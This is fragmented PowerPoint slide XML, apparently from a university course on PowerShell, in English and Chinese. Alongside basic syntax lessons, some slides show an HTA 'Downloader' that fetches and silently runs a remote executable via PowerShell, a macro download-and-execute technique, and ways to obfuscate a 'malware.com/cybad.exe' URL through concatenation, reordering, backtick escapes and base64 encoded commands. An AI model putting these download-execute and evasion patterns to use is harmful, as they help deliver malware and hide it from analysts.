            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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hsufh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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/COURSES/SPRING2022/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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calc.exe’,‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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zh-TW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:\Users\Fu-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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Hau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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H\Desktop\test1.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="16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r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="16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zh-TW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Start-Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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zh-TW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:\Users\Fu-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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Hau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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H\Desktop\test1.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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  <a:r>
              <a:rPr lang="zh-TW" alt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altLang="zh-TW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Sub</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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Use a Macro to Download and Execute a Remote File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067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7" cy="43204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&lt;title&gt;Downloader&lt;/title&gt;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&lt;HTA:APPLICATION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APPLICATIONNAME="Downloader"&gt;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head&gt;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//We will use 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Wscript.shell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order to launch PowerShell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new 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ActiveXObject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Wscript.Shell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//Our command to execute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"powershell.exe -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-command (New-Object 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System.Net.WebClient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DownloadFile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('https://staff.csie.ncu.edu.tw/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hsufh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/COURSES/SPRING2022/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calc.exe','C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:\Users\Fu-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Hau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H\Desktop\test1.exe'); Start-Process ('C:\Users\Fu-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Hau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H\Desktop\test1.exe')"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//Run the command, 0 is needed so that no PowerShell window will appear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b="1" dirty="0" err="1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a.Run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(cmd,1);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zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00A2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html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00A24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AABD-FA9A-4595-B0DC-B43C8EC57D89}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>111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Download and Execute a Remote File Using a HTA File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cyber one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267744" y="55172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This HTA file downloads an executable from a remote server and executes the download file.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9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496944" cy="345069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can be executed in either one of the following ways:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Registry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dirty="0"/>
              <a:t>This technique was extensively used by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Poweliks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and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kovter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> malware variants (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mshta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> or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rundll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>File:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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.ps1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/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.VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> /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.BAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> and scheduled task.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Macros:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Office files-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altLang="zh-TW" dirty="0"/>
              <a:t>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Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>Remotely:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Remoting (PSS),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dirty="0"/>
              <a:t>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WMI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>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Execution Options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75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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>split strings into multiple parts which are concatenated through the “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zh-TW" dirty="0"/>
              <a:t>” operator </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a: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“http://malware.com/cybad.exe”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 = (‘h’+’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ttp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ma’+’lware.com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/cybad.exe’)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Obfuscation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- Concatenation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73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Formatting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>operator (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altLang="zh-TW" dirty="0"/>
              <a:t>), the string is divided in several parts and will reorder by the (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altLang="zh-TW" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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“{1}{0}” -f ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i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x’,’IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i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lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" i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"{1}{0}" -f 'X', 'IE'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Reordering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dirty="0"/>
              <a:t>Concatenation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty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5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Escape </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>character (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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) will try to trick the analyst to understand the command, they are typically inserted into the middle of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="301943" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/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://malware.com/cybad.exe à $a = (“http://mal`ware.c`om.cy`bad.ex`e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Escaping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Character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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> Concatenation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty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18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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(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EncodedCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>) accepts a base-64 encoded string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p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Start-Process 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“c:\passwords”” à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ZABpAHIAIAAiAGMAOgBcAHAAYQBzAHMAdwBvAHIAZABzACIAIAA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=0g</a:t>
            </a:r>
          </a:p>
          <a:p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encodedCommand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ZABpAHIAIAAiAGMAOgBcAHAAYQBzAHMAdwBvAHIAZABzACIAIAA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Base64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Format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dirty="0"/>
              <a:t>Concatenation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty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cynet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91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2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/>
              <a:t>Supplementary Material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3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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>如果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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>值是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>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dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，則從標準輸入讀取命令文字。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119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baseline="-25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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" baseline="-250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-?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61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While single quotes do not evaluate expressions or variables, they do evaluate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>wildcards</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, so the following two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en-US" altLang="zh-TW" dirty="0"/>
              <a:t> both evaluate to True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pPr marL="301943" lvl="1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-like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"ab*" </a:t>
            </a:r>
            <a:b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-like 'ab*'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Exception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4"/>
              </a:rPr>
              <a:t>SS64.com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82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(1) https://ss64.com/ps/syntax-esc.html#quotes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(2) https://ss64.com/ps/invoke-expression.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(3) https://iter01.com/512458.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(4) https://www.delftstack.com/zh-tw/howto/powershell/invoke-expressions-using-powershell/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120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URLs of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Articles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81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2636912"/>
            <a:ext cx="8714376" cy="374441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/>
              <a:t>A string passed to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is still executed as PowerShell code, so the script block curly braces are often not required in the first place when running from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cmd.exe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To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>execute an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" u="sng" dirty="0"/>
              <a:t>inline script block </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>defined inside a string, the call operator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 can be used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: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-Command "&amp; {Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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WinEvent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LogName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security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}“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW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/>
              <a:t>If the value of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is a string,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must be the last parameter for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pwsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, because all arguments following it are interpreted as part of the command to execute.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121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String Parameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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35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568952" cy="3450696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The call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>operator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> (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) allows you to execute a command, script or function. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Many times you can execute a command by just typing its name, but this will only run if the command is in the environment path. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if the command (or the path) contains a space then this will fail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Surrounding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>a command with quotes will make PowerShell treat it as a string, so in addition to quotes, use the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 call operator to force PowerShell to treat the string as a command to be executed. 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122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呼叫</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>運算子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3"/>
              </a:rPr>
              <a:t>SS64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5522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568951" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>When you enclose a string in double quotation marks, any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names </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>in the string such as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altLang="zh-TW" dirty="0"/>
              <a:t>will be replaced with the variable's value when the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US" altLang="zh-TW" dirty="0"/>
              <a:t> is processed. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>can prevent this substitution by prefixing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dirty="0"/>
              <a:t> with an escape character. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>embedded double quotes can be escaped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`"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> or doubled (replace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dirty="0"/>
              <a:t> with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Double-Quoted Strings </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(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dirty="0" smtClean="0"/>
              <a:t>)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SS64.com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92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64095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`$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="Hello"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`$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altLang="zh-TW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cake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should cost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</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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SS64.com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36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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" alt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位於 線路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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" alt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字元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:3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""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~~~~~</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" alt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運算式或陳述式中有未預期的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""' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" alt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語彙基元。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" alt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CategoryInfo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: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ParserError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(:) [],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ParentContainsErrorRecordException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FullyQualifiedErrorId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UnexpectedToken</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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””</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Is not a String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26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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>If you nest a Single-Quoted String inside a larger Double-Quoted string, the double-quoted rules apply. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Similarly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>if you nest a Double-Quoted String inside a larger Single-Quoted string, the single-quoted rules apply.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outermost quotes always determine the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>behavior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Combining Single-Quoted Strings and Double-Quoted Strings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SS64.com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620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675467"/>
            <a:ext cx="856895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45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value of " + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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"is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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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'45'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" alt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SS64.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]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93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3" y="2675467"/>
            <a:ext cx="8640960" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>所有會產生輸出的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>cmdlet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指令，也可以傳回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>資料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>物件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例如 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>就會傳回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System.Diagnostics.Process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這種物件，我們可以把指令傳回的物件儲存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>變數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中，方便後續的指令稿使用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在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>PowerShell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中，變數名稱都是以錢字號（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zh-TW" altLang="en-US" dirty="0"/>
              <a:t>）開頭，若要把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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指令的查詢結果儲存下來，可以這樣寫：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 = Get-Process -Name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Greenshot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資料物件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5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2" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這一行指令是計算從現在的時間到晚上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21:45</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>還有多久：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[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"21:45" - [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]::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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這裡用中括號包起來的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zh-TW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 smtClean="0"/>
              <a:t>代表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System.DateTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>類別</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，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"21:45"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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/>
              <a:t>的作用是將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"21:45"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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/>
              <a:t>這個字串轉換為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System.DateTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的物件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>後面的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]::Now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2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/>
              <a:t>代表呼叫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System.DateTime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>類別內的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en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>靜態函數</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，傳回現在的時間，與前面的時間相減之後，就得到間隔的時間了。</a:t>
            </a:r>
          </a:p>
          <a:p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日期與時間的處理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0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7" y="2675467"/>
            <a:ext cx="8352928" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>乾貨！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利用詳解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Tovd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW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zh-TW" altLang="zh-TW" dirty="0"/>
              <a:t>免殺從入門到實踐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty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3" tooltip="FreeBuf"/>
              </a:rPr>
              <a:t>FreeBuf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]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zh-TW" altLang="en-US" dirty="0"/>
              <a:t>基礎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4"/>
              </a:rPr>
              <a:t>Guko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>如何撰寫以及執行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script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>洪懷哲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Windows PowerShell How-to guides and examples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6"/>
              </a:rPr>
              <a:t>ss64.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>What Is PowerShell? Meaning, Working, Uses, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Advantages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US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>
                <a:hlinkClick r:id="rId7" tooltip="Chiradeep BasuMallick"/>
              </a:rPr>
              <a:t>Chiradeep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId7" tooltip="Chiradeep BasuMallick"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId7" tooltip="Chiradeep BasuMallick"/>
              </a:rPr>
              <a:t>BasuMallick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25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1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有時候我們在處理資料時，會經過好幾道程序，前一個指令的輸出會作為下一個指令的輸入，在這種狀況下就可以使用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管線</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>（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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>）功能，串接多個指令。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的管線符號為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zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，只要上一個指令所產生的物件類型可以被下一個指令接受，就可以用管線符號直接串接起來使用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管線</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>和 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Unix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的管線略有不同，前者所傳遞的是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>
                <a:solidFill>
